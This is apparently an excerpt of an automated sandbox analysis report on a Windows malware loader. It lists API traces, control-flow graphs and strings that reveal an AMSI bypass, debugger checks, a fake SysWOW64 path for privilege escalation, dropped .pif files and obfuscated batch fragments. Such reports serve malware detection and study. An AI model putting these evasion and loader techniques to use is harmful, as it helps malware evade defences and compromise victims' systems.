                        • Part of subcall function 0286DF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0286DFA6
                        • Part of subcall function 0286DF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0286DFAF
                        • Part of subcall function 02868798: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,028B23A4,0286A3BF,ScanString,028B23A4,0286A774,ScanBuffer,028B23A4,0286A774,Initialize,028B23A4,0286A774,UacScan), ref: 028687AC
                        • Part of subcall function 02868798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028687C6
                        • Part of subcall function 02868798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,028B23A4,0286A3BF,ScanString,028B23A4,0286A774,ScanBuffer,028B23A4,0286A774,Initialize), ref: 02868802
                        • Part of subcall function 02868704: LoadLibraryW.KERNEL32(amsi), ref: 0286870D
                        • Part of subcall function 02868704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0286876C
                      • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,028B237C,0287B40C,OpenSession,028B237C,0287B40C,ScanBuffer,028B237C,0287B40C,OpenSession,028B237C,0287B40C,0287B764), ref: 02874DEB
                        • Part of subcall function 0286DE78: RtlInitUnicodeString.NTDLL(?,?), ref: 0286DEA0
                        • Part of subcall function 0286DE78: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0286DEF2), ref: 0286DEB6
                        • Part of subcall function 0286DE78: NtDeleteFile.NTDLL(?), ref: 0286DED5
                      • MoveFileA.KERNEL32(00000000,00000000), ref: 02874FEB
                      • MoveFileA.KERNEL32(00000000,00000000), ref: 02875041
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                      • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                      • API String ID: 2010126900-181751239
                      • Opcode ID: 4a6af8d5175f16f4390cc43eb0f2f187b10861abb1eaff431fa7381c0ed5b936
                      • Instruction ID: 5f799375e4cbdc18c6ccfa982a5d0e668c24e68f34ce96a08ecddd317e076c42
                      • Opcode Fuzzy Hash: 4a6af8d5175f16f4390cc43eb0f2f187b10861abb1eaff431fa7381c0ed5b936
                      • Instruction Fuzzy Hash: CA24D93CA101698BEB20EF68DD80ADE73F7BF94304F1084E5E409E7655DA74AE858F52
                      Function 02855A78 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 5547 2855a78-2855ab9 GetModuleFileNameA RegOpenKeyExA 5548 2855afb-2855b3e call 28558b4 RegQueryValueExA 5547->5548 5549 2855abb-2855ad7 RegOpenKeyExA 5547->5549 5556 2855b40-2855b5c RegQueryValueExA 5548->5556 5557 2855b62-2855b7c RegCloseKey 5548->5557 5549->5548 5550 2855ad9-2855af5 RegOpenKeyExA 5549->5550 5550->5548 5552 2855b84-2855bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 5550->5552 5554 2855c9e-2855ca5 5552->5554 5555 2855bbb-2855bbf 5552->5555 5560 2855bc1-2855bc5 5555->5560 5561 2855bcb-2855be1 lstrlenA 5555->5561 5556->5557 5558 2855b5e 5556->5558 5558->5557 5560->5554 5560->5561 5562 2855be4-2855be7 5561->5562 5563 2855bf3-2855bfb 5562->5563 5564 2855be9-2855bf1 5562->5564 5563->5554 5566 2855c01-2855c06 5563->5566 5564->5563 5565 2855be3 5564->5565 5565->5562 5567 2855c30-2855c32 5566->5567 5568 2855c08-2855c2e lstrcpynA LoadLibraryExA 5566->5568 5567->5554 5569 2855c34-2855c38 5567->5569 5568->5567 5569->5554 5570 2855c3a-2855c6a lstrcpynA LoadLibraryExA 5569->5570 5570->5554 5571 2855c6c-2855c9c lstrcpynA LoadLibraryExA 5570->5571 5571->5554
                      APIs
                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02850000,0287E790), ref: 02855A94
                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02850000,0287E790), ref: 02855AB2
                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02850000,0287E790), ref: 02855AD0
                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02855AEE
                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02855B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02855B37
                      • RegQueryValueExA.ADVAPI32(?,02855CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02855B7D,?,80000001), ref: 02855B55
                      • RegCloseKey.ADVAPI32(?,02855B84,00000000,?,?,00000000,02855B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02855B77
                      • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02855B94
                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02855BA1
                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02855BA7
                      • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02855BD2
                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02855C19
                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02855C29
                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02855C51
                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02855C61
                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02855C87
                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02855C97
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                      • API String ID: 1759228003-2375825460
                      • Opcode ID: a1c8cf54dbf5fc811c062e10e6109ac706bcaf7807a732947b6c0ed45846943c
                      • Instruction ID: c6c545be234b803eec101e1deeaf1e4c515e272de08f7ef4692386d5cc61fcb1
                      • Opcode Fuzzy Hash: a1c8cf54dbf5fc811c062e10e6109ac706bcaf7807a732947b6c0ed45846943c
                      • Instruction Fuzzy Hash: E0516A7DA4026C7EFB21D6A4CC49FEF77BD9B04744F8001A1AE08E6181D7789A448F66
                      Function 0286F024 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 5647 286f024-286f03e GetModuleHandleW 5648 286f040-286f052 GetProcAddress 5647->5648 5649 286f06a-286f072 5647->5649 5648->5649 5650 286f054-286f064 CheckRemoteDebuggerPresent 5648->5650 5650->5649 5651 286f066 5650->5651 5651->5649
                      APIs
                      • GetModuleHandleW.KERNEL32(KernelBase), ref: 0286F034
                      • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0286F046
                      • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0286F05D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                      • String ID: CheckRemoteDebuggerPresent$KernelBase
                      • API String ID: 35162468-539270669
                      • Opcode ID: 404985986749571d360da7b1fc7947faf77f782cbff1191cacb2944288c6642f
                      • Instruction ID: 8d32f38bc2862bcb1046d022f47e248997fa5a2ca849fc4164cb2d8266a59bf4
                      • Opcode Fuzzy Hash: 404985986749571d360da7b1fc7947faf77f782cbff1191cacb2944288c6642f
                      • Instruction Fuzzy Hash: 66F0273C900228BADB10B6A8988CBECFBF85B25328F6403C0A536E21C1E3754640C653
                      Function 0286DFE4 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 02854ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02854EDA
                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0286E0B4), ref: 0286E01F
                      • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0286E0B4), ref: 0286E04F
                      • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0286E064
                      • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0286E090
                      • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0286E099
                        • Part of subcall function 02854C0C: SysFreeString.OLEAUT32(0286ED84), ref: 02854C1A
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                      • String ID:
                      • API String ID: 1897104825-0
                      • Opcode ID: 76b13c4017cc381cf3642cba6a213d98192569639a4ce16bd1b095f737e7da3b
                      • Instruction ID: b7a1699438472fd5db110d91b7d6a11176623b0ab8591acfcee8ab4fc0a1c633
                      • Opcode Fuzzy Hash: 76b13c4017cc381cf3642cba6a213d98192569639a4ce16bd1b095f737e7da3b
                      • Instruction Fuzzy Hash: 9321C17DB40318BAEB11EAE8CC46FEE77BDAB48B04F500461B704F71C0D6B4AA458B56
                      Function 0286E72C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0286E86A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: CheckConnectionInternet
                      • String ID: Initialize$OpenSession$ScanBuffer
                      • API String ID: 3847983778-3852638603
                      • Opcode ID: 38207dc69a3cc9650be978bfe6a95a67b4f531c3c95dfa2516bfc950e687a304
                      • Instruction ID: c2e8a0bb742cfe36e451578e25876c2dc9ccf32fa79d42a24a4cd1dacb50c0b0
                      • Opcode Fuzzy Hash: 38207dc69a3cc9650be978bfe6a95a67b4f531c3c95dfa2516bfc950e687a304
                      • Instruction Fuzzy Hash: 48411F3DA102189FEB10EFA8D881EAEB7FAEF48710F214431E841E7251DA74AD458F52
                      Function 02867CF8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 02868018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02868088,?,?,00000000,?,028679FE,ntdll,00000000,00000000,02867A43,?,?,00000000), ref: 02868056
                        • Part of subcall function 02868018: GetModuleHandleA.KERNELBASE(?), ref: 0286806A
                        • Part of subcall function 028680C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02868148,?,?,00000000,00000000,?,02868061,00000000,KernelBASE,00000000,00000000,02868088), ref: 0286810D
                        • Part of subcall function 028680C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02868113
                        • Part of subcall function 028680C0: GetProcAddress.KERNEL32(?,?), ref: 02868125
                      • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02867D6C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                      • String ID: Ntdll$yromeMlautriVetirW
                      • API String ID: 2719805696-3542721025
                      • Opcode ID: 96576e318656a92f8a32218262e7ffb290ce6f28244c38d70c709e0935c5cb24
                      • Instruction ID: a4a4440c54469bd7d3a46972263d14726fd61cad85448c1fca0b943caa59a1cb
                      • Opcode Fuzzy Hash: 96576e318656a92f8a32218262e7ffb290ce6f28244c38d70c709e0935c5cb24
                      • Instruction Fuzzy Hash: BC018C7C640208AFE701EF98D845EAEB7EDEB4C704F514854B904D7694C634A9148BA2
                      Function 02866D48 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                        • Part of subcall function 02866CEC: CLSIDFromProgID.OLE32(00000000,?,00000000,02866D39,?,?,?,00000000), ref: 02866D19
                      • CoCreateInstance.OLE32(?,00000000,00000005,02866E2C,00000000,00000000,02866DAB,?,00000000,02866E1B), ref: 02866D97
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: CreateFromInstanceProg
                      • String ID:
                      • API String ID: 2151042543-0
                      • Opcode ID: 65c40f0b19065ca358790d5fc6af019e519433211a41d39f6eedca6334c94f38
                      • Instruction ID: 8461f32faf3f1b36e7c467f78a4359eaa9d5c766b107c3ce4c8e75efd7dcf430
                      • Opcode Fuzzy Hash: 65c40f0b19065ca358790d5fc6af019e519433211a41d39f6eedca6334c94f38
                      • Instruction Fuzzy Hash: B001473C6087546EF711DFA4DC1687FBBAEE748B00B610835F801D2640F6389900C861
                      Function 02851724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 5572 2851724-2851736 5573 285173c-285174c 5572->5573 5574 2851968-285196d 5572->5574 5577 28517a4-28517ad 5573->5577 5578 285174e-285175b 5573->5578 5575 2851a80-2851a83 5574->5575 5576 2851973-2851984 5574->5576 5584 2851684-28516ad VirtualAlloc 5575->5584 5585 2851a89-2851a8b 5575->5585 5581 2851986-28519a2 5576->5581 5582 2851938-2851945 5576->5582 5577->5578 5583 28517af-28517bb 5577->5583 5579 2851774-2851780 5578->5579 5580 285175d-285176a 5578->5580 5589 28517f0-28517f9 5579->5589 5590 2851782-2851790 5579->5590 5586 2851794-28517a1 5580->5586 5587 285176c-2851770 5580->5587 5591 28519a4-28519ac 5581->5591 5592 28519b0-28519bf 5581->5592 5582->5581 5588 2851947-285195b Sleep 5582->5588 5583->5578 5593 28517bd-28517c9 5583->5593 5594 28516df-28516e5 5584->5594 5595 28516af-28516dc call 2851644 5584->5595 5588->5581 5596 285195d-2851964 Sleep 5588->5596 5602 285182c-2851836 5589->5602 5603 28517fb-2851808 5589->5603 5597 2851a0c-2851a22 5591->5597 5598 28519c1-28519d5 5592->5598 5599 28519d8-28519e0 5592->5599 5593->5578 5600 28517cb-28517de Sleep 5593->5600 5595->5594 5596->5582 5609 2851a24-2851a32 5597->5609 5610 2851a3b-2851a47 5597->5610 5598->5597 5606 28519e2-28519fa 5599->5606 5607 28519fc-28519fe call 28515cc 5599->5607 5600->5578 5604 28517e4-28517eb Sleep 5600->5604 5611 28518a8-28518b4 5602->5611 5612 2851838-2851863 5602->5612 5603->5602 5608 285180a-285181e Sleep 5603->5608 5604->5577 5620 2851a03-2851a0b 5606->5620 5607->5620 5608->5602 5622 2851820-2851827 Sleep 5608->5622 5609->5610 5613 2851a34 5609->5613 5616 2851a49-2851a5c 5610->5616 5617 2851a68 5610->5617 5618 28518b6-28518c8 5611->5618 5619 28518dc-28518eb call 28515cc 5611->5619 5614 2851865-2851873 5612->5614 5615 285187c-285188a 5612->5615 5613->5610 5614->5615 5623 2851875 5614->5623 5624 285188c-28518a6 call 2851500 5615->5624 5625 28518f8 5615->5625 5626 2851a6d-2851a7f 5616->5626 5627 2851a5e-2851a63 call 2851500 5616->5627 5617->5626 5628 28518cc-28518da 5618->5628 5629 28518ca 5618->5629 5633 28518fd-2851936 5619->5633 5637 28518ed-28518f7 5619->5637 5622->5603 5623->5615 5624->5633 5625->5633 5627->5626 5628->5633 5629->5628
                      APIs
                      • Sleep.KERNEL32(00000000), ref: 028517D0
                      • Sleep.KERNEL32(0000000A,00000000), ref: 028517E6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: Sleep
                      • String ID:
                      • API String ID: 3472027048-0
                      • Opcode ID: a2b5801158c000f41e3eeb1e6c9e1f838e9a8da11626efa13ac11996e7b7ee50
                      • Instruction ID: ab1f1acf4c6629c383d56bc174ef46240da44c5e17200cdd37ceff063e29bdbe
                      • Opcode Fuzzy Hash: a2b5801158c000f41e3eeb1e6c9e1f838e9a8da11626efa13ac11996e7b7ee50
                      • Instruction Fuzzy Hash: AFB1467EA002A08BDB16CF2CE4C8365BBE1EB84315F1886AED94DCB3C5DB719455CB90
                      Function 02868704 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35libraryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      APIs
                      • LoadLibraryW.KERNEL32(amsi), ref: 0286870D
                        • Part of subcall function 028680C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02868148,?,?,00000000,00000000,?,02868061,00000000,KernelBASE,00000000,00000000,02868088), ref: 0286810D
                        • Part of subcall function 028680C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02868113
                        • Part of subcall function 028680C0: GetProcAddress.KERNEL32(?,?), ref: 02868125
                        • Part of subcall function 02867CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02867D6C
                      • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0286876C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2938385272.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                      • Associated: 00000000.00000002.2938369164.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938436604.000000000287E000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938494057.00000000028B2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.2938530107.00000000029A9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2850000_LbZ88q4uPa.jbxd
                      Similarity
                      • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                      • String ID: DllGetClassObject$W$amsi
                      • API String ID: 941070894-2671292670
                      • Opcode ID: 58a1aaa533ca4dad65ae46b2c37603675791d52e2b0d43562e01cad8d55114b8
                      • Instruction ID: a02eea77e7be349fe344309e68d940b5fa15657f2b8aabeec7cb8623dd35898f
                      • Opcode Fuzzy Hash: 58a1aaa533ca4dad65ae46b2c37603675791d52e2b0d43562e01cad8d55114b8
                      • Instruction Fuzzy Hash: EDF0445854C381B9E201E6788C49F5BBECE4B52224F448A58B6E8DA2D2D679D10487A7
                      Function 02851A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
